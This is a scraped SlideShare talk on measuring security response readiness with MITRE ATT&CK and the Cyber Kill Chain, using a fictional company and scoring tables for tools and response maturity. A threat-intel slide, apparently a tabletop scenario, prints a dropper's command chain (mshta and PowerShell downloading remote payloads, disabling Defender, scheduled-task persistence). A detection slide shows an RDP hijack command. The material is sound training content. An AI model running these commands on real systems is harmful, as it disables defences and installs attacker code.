SlideShare a Scribd company logo

How to measure your security response readiness?

T
Tomasz Jakubowski

The document discusses measuring cybersecurity response readiness using the MITRE ATT&CK framework and the Lockheed Martin Cyber Kill Chain. It outlines various tactics, techniques, and scenarios to evaluate and enhance a defense strategy, highlighting the importance of early detection and response automation. Additionally, it provides example vulnerabilities and suggested mitigations to improve organizations' cybersecurity posture.

Technology
Related topics:
Information Security
1 of 29
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
How to measure your security response readiness?
What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
ROUTERFIREWALLFIREWALL SWITCH MAILWWW SWITCH INTERNET NIDSNAV DBSIEM SVR USER1 USER3USER2 USER4 PROXY On Host: - FW - AV - IDS
Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
Source: https://mitre-attack.github.io/attack-navigator/enterprise/
T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report T1193: Spearphishing Attachment T1089: Disabling Security Tools T1170: MshtaT1481: Web Service T1053: Scheduled Task T1027: Obfuscated Files or Information T1064: Scripting T1086: PowerShell T1112: Modify Registry
How to measure your security response readiness?
Maturity 0 = We do nothing 1 = Locally logged Relevant data is captured on the endpoint 2 = Centrally logged Data is gathered centrally 4 = Alerting We have rules to detect anomalies, suspicious events 5 = Playbook exists A process to respond exists (incl. analyse, contain, eradicate, recover) 6 = Response is automated We have automated response for this alert 3 = Correlated / enriched Logs for the event are enriched with data from other sources to increase fidelity
6 = Response is automated 5 = Playbook exists 4 = Alerting 3 = Correlated / enriched 2 = Centrally logged 1 = Locally logged 0 = We do nothing
Scenario 3: It’s all about the money • There is an ongoing trade war between 2 biggest economies in the world • Unfortunately this has an impact on the wealthiest people who are Sense//Net Library’s customers • Few of them decided to put their AI constructs to sleep until better times come hence your profits decrease • The management decided it’s time to cut costs and your department needs to participate • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 T1193: Spearphishing Attachment T1089: Disabling Security Tools T1112: Modify Registry T1086: PowerShell T1053: Scheduled Task Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity Shortlisted Techniques
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Toolset measure Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 Current Proposed T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7 T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8 T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7 T1086: PowerShell 2 0 0 2 2 0 2 1 9 8 T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7 44 37 100% 84% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity
Scenario 4: Let’s go shopping • Times are changing and the company profits picked up • You successfully argued to get a bigger budget and now you can spend some money on a new security control • Your team shortlisted a few vendors and you’ve conducted a PoC • The results are that there a few differences in the products • The procurement team negotiated almost similar prices for the products
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Future Toolset measure Early warning Inbound Protect Detect Outbound Protect Proposed Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 ToolA ToolB Current ProposedA ProposedB T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7 T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10 T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7 T1086: PowerShell 2 0 2 2 2 0 0 8 8 8 T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7 37 43 39 100% 116% 105% 44 43 39 100% 98% 89% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity [2] Proposal Applicable [0] N/A Previous compared to Proposed A and B
Other use cases Source: https://attack.mitre.org/docs/attack_roadmap.pdf
Putting it all together Vulnerability reports Threat Intel reports Toolset effectiveness Response maturity ...

More Related Content

PDF
Malware collection and analysis
Chong-Kuan Chen
 
PDF
Android Application Security
Chong-Kuan Chen
 
PDF
Security events in 2014
Chong-Kuan Chen
 
PDF
Addios!
Chong-Kuan Chen
 
PDF
2012 S&P Paper Reading Session1
Chong-Kuan Chen
 
PPTX
Dealing with legacy code
Prachi Gulihar
 
PPTX
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
Christopher Gerritz
 
PDF
Windows server hardening 1
Frank Avila Zapata
 
Malware collection and analysis
Chong-Kuan Chen
 
Android Application Security
Chong-Kuan Chen
 
Security events in 2014
Chong-Kuan Chen
 
Addios!
Chong-Kuan Chen
 
2012 S&P Paper Reading Session1
Chong-Kuan Chen
 
Dealing with legacy code
Prachi Gulihar
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
Christopher Gerritz
 
Windows server hardening 1
Frank Avila Zapata
 

What's hot (20)

PDF
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
PPTX
External to DA, the OS X Way
Stephan Borosh
 
PPTX
Web application security part 01
Prachi Gulihar
 
PPTX
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat Security Conference
 
PDF
The Dark Side of PowerShell by George Dobrea
EC-Council
 
PDF
3. APTs Presentation
isc2-hellenic
 
PPTX
Integrated Tools in OSSIM
AlienVault
 
PDF
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE - ATT&CKcon
 
PPTX
technical overview - endpoint protection 10.3.3
Muhammad Denis Iqbal
 
PPTX
Web application security part 02
Prachi Gulihar
 
PPT
DDoS Attacks
Jignesh Patel
 
PPTX
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
PDF
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
PDF
Defcon 22-tim-mcguffin-one-man-shop
Priyanka Aash
 
PDF
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
PPTX
Advanced Client Side Exploitation Using BeEF
1N3
 
PDF
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Florian Roth
 
PDF
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
PDF
CNIT 128 8. Android Implementation Issues (Part 3)
Sam Bowne
 
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
External to DA, the OS X Way
Stephan Borosh
 
Web application security part 01
Prachi Gulihar
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat Security Conference
 
The Dark Side of PowerShell by George Dobrea
EC-Council
 
3. APTs Presentation
isc2-hellenic
 
Integrated Tools in OSSIM
AlienVault
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE - ATT&CKcon
 
technical overview - endpoint protection 10.3.3
Muhammad Denis Iqbal
 
Web application security part 02
Prachi Gulihar
 
DDoS Attacks
Jignesh Patel
 
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Defcon 22-tim-mcguffin-one-man-shop
Priyanka Aash
 
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Advanced Client Side Exploitation Using BeEF
1N3
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Florian Roth
 
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
CNIT 128 8. Android Implementation Issues (Part 3)
Sam Bowne
 
Ad

Similar to How to measure your security response readiness? (20)

PPTX
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
PDF
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
PDF
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
Katie Nickels
 
PDF
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
Robert Brandel
 
PDF
Becoming a Yogi on Mac ATT&CK with OceanLotus Postures
Adam Pennington
 
PDF
Update from the MITRE ATT&CK Team
Adam Pennington
 
PDF
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec
 
PDF
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Adam Pennington
 
PDF
Upgrade your attack model: finding and stopping fileless attacks with MITRE A...
FaithWestdorp
 
PPTX
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
PDF
Leveraging Campaigns to Untangle the Threat Group Ship of Theseus
Adam Pennington
 
PDF
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
Adam Pennington
 
PDF
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
PDF
MITRE-Module 1 Slides.pdf
ReZa AdineH
 
PDF
State of the ATT&CK - ATT&CKcon Power Hour
Adam Pennington
 
PDF
Ce hv8 module 17 evading ids, firewalls, and honeypots
Mehrdad Jingoism
 
PDF
(SACON) Wasim Halani & Arpan Raval - Practical Threat Hunting - Developing an...
Priyanka Aash
 
PDF
State of the ATTACK
MITRE - ATT&CKcon
 
PDF
Getting Bear-y Cozy with PowerShell
JamieWilliams130
 
PDF
One Technique, Two Techniques, Red Technique, Blue Technique
Daniel Weiss
 
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
Katie Nickels
 
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
Robert Brandel
 
Becoming a Yogi on Mac ATT&CK with OceanLotus Postures
Adam Pennington
 
Update from the MITRE ATT&CK Team
Adam Pennington
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec
 
Anomali Detect 19 - Nickels & Pennington - Turning Intelligence into Action w...
Adam Pennington
 
Upgrade your attack model: finding and stopping fileless attacks with MITRE A...
FaithWestdorp
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Leveraging Campaigns to Untangle the Threat Group Ship of Theseus
Adam Pennington
 
Pennington - Defending Against Targeted Ransomware with MITRE ATT&CK
Adam Pennington
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
MITRE-Module 1 Slides.pdf
ReZa AdineH
 
State of the ATT&CK - ATT&CKcon Power Hour
Adam Pennington
 
Ce hv8 module 17 evading ids, firewalls, and honeypots
Mehrdad Jingoism
 
(SACON) Wasim Halani & Arpan Raval - Practical Threat Hunting - Developing an...
Priyanka Aash
 
State of the ATTACK
MITRE - ATT&CKcon
 
Getting Bear-y Cozy with PowerShell
JamieWilliams130
 
One Technique, Two Techniques, Red Technique, Blue Technique
Daniel Weiss
 
Ad

Recently uploaded (20)

PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Getting Started with Data Integration: FME Form 101
Safe Software
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
Encapsulation theory and applications.pdf
gurumoop
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Teaching material agriculture food technology
LiaRayya
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Getting Started with Data Integration: FME Form 101
Safe Software
 

How to measure your security response readiness?

  • 1. How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
  • 2. Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
  • 3. 0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
  • 4. MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
  • 5. MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
  • 6. MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
  • 8. What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
  • 9. There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
  • 10. MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
  • 11. The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
  • 13. Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
  • 14. Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
  • 15. Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
  • 17. T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
